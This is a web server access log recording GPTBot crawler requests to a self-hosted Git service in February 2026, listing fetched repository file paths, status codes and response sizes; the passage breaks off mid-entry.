"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md?display=source" [Client 74.7.227.38] [Length 169612] [Gzip 7.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:16:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12123] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 20103] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:16:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:21:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 16095] [Gzip 9.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14449] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" +[17/Feb/2026:16:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12528] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12500] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" +[17/Feb/2026:16:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:16:21:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:16:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll?display=rendered" [Client 74.7.227.38] [Length 10857] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" +[17/Feb/2026:16:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" +[17/Feb/2026:16:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10799] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" +[17/Feb/2026:16:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12126] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 10807] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" +[17/Feb/2026:16:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 20073] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:16:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 20104] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:16:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:16:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service?display=source" [Client 74.7.227.38] [Length 12393] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12173] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:16:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12529] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 10807] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:16:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 83218] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:16:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt?display=source" [Client 74.7.227.38] [Length 11104] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe?display=rendered" [Client 74.7.227.38] [Length 10818] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10766] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" +[17/Feb/2026:16:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" +[17/Feb/2026:16:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:16:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe?display=rendered" [Client 74.7.227.38] [Length 10846] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16561] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" +[17/Feb/2026:16:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" +[17/Feb/2026:16:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip?display=rendered" [Client 74.7.227.38] [Length 10858] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" +[17/Feb/2026:16:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16207] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" +[17/Feb/2026:16:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" +[17/Feb/2026:16:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py?display=source" [Client 